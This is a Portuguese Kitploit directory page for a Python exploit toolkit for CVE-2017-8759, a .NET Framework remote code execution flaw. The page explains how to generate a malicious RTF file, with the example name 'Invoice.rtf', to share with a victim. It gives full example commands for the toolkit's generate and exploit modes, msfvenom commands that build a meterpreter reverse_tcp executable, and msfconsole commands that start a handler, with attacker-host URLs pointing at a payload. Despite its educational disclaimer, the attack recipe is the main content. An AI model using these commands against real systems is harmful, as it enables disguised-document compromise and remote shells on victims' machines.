Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2017-8760 — Script Python para gerar arquivos RTF maliciosos explorando CVE-2017-8759 (Microsoft .NET Framework RCE) e entregar payloads Metasploit/meterpreter para testes de penetração. | Kitploit
Ferramentas/GitHubGitHub/voraka/cve-2017-8760
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubvoraka/cve-2017-8760

cve-2017-8760

Script Python para gerar arquivos RTF maliciosos explorando CVE-2017-8759 (Microsoft .NET Framework RCE) e entregar payloads Metasploit/meterpreter para testes de penetração.

Ver Repositório
3há 7 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit toolkit CVE-2017-8759 - v1.0

Exploit toolkit CVE-2017-8759 - v1.0 é um script Python útil que fornece a pentesters e pesquisadores de segurança uma maneira rápida e eficaz de testar RCE no Microsoft .NET Framework. Ele pode gerar um arquivo RTF malicioso e entregar metasploit/meterpreter/outros payloads à vítima sem qualquer configuração complexa.

Aviso

Este programa é apenas para fins educacionais. Não o utilize sem permissão. O aviso padrão se aplica, especialmente o fato de que eu (bhdresh) não sou responsável por quaisquer danos causados pelo uso direto ou indireto das informações ou funcionalidades fornecidas por estes programas. O autor ou qualquer provedor de Internet NÃO assume responsabilidade pelo conteúdo ou uso indevido destes programas ou quaisquer derivados. Ao usar este programa, você aceita que qualquer dano (perda de dados, falha do sistema, comprometimento do sistema, etc.) causado pelo uso destes programas não é de responsabilidade do bhdresh.

Finalmente, este é um desenvolvimento pessoal, por favor respeite sua filosofia e não o use para coisas ruins!

Licença

Licença CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

Nota de versão:

Foram introduzidas as seguintes capacidades ao script

root@kitploit:~
- Gerar arquivo RTF malicioso
- Modo de exploração para o arquivo RTF gerado

Versão: Python versão 2.7.13

Cenário: Entregar payload meterpreter local

Tutorial em vídeo: https://www.youtube.com/watch?v=46jEa1bmORM
Comandos de exemplo
root@kitploit:~
1) Gerar arquivo RTF malicioso
   # python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Opcional, se estiver usando payload MSF): Gerar payload metasploit e iniciar handler
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Iniciar o toolkit em modo de exploração para entregar payload local
   # python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

Argumentos da linha de comando:

root@kitploit:~
# python cve-2017-8759_toolkit.py -h

Este é um toolkit útil para explorar CVE-2017-8759 (RCE no Microsoft .NET Framework)

Modos:

-M gen                                          Gerar apenas o arquivo malicioso

     Gerar arquivo RTF malicioso:

      -w <Filename.rtf>                   Nome do arquivo RTF malicioso (Compartilhe este arquivo com a vítima).

      -u <http://attacker.com/test.txt>   Caminho do arquivo txt remoto. Normalmente, deve ser um domínio ou IP onde esta                                          ferramenta está sendo executada.
                                          Por exemplo, http://attackerip.com/test.txt (Esta URL será incluída no arquivo 	                                              RTF malicioso e será solicitada quando a vítima abrir o arquivo RTF malicioso.

				      
-M exp                                          Iniciar modo de exploração

     Exploração:
  
      -p <TCP port:Default 80>            Número da porta local.

      -e <http://attacker.com/shell.exe>  Caminho de um arquivo executável / shell meterpreter / payload que precisa ser executado no alvo.

      -l </tmp/shell.exe>                 Especificar caminho local de um arquivo executável / shell meterpreter / payload.

Autor

@bhdresh

Créditos

@Voulnet, @vysec, @bhdresh

Bugs, problemas, solicitações de funcionalidades

Obviamente, não sou um desenvolvedor em tempo integral, então espere alguns contratempos

Por favor, reporte bugs e problemas através de https://github.com/bhdresh/CVE-2017-8759/issues/new

Baixar ferramenta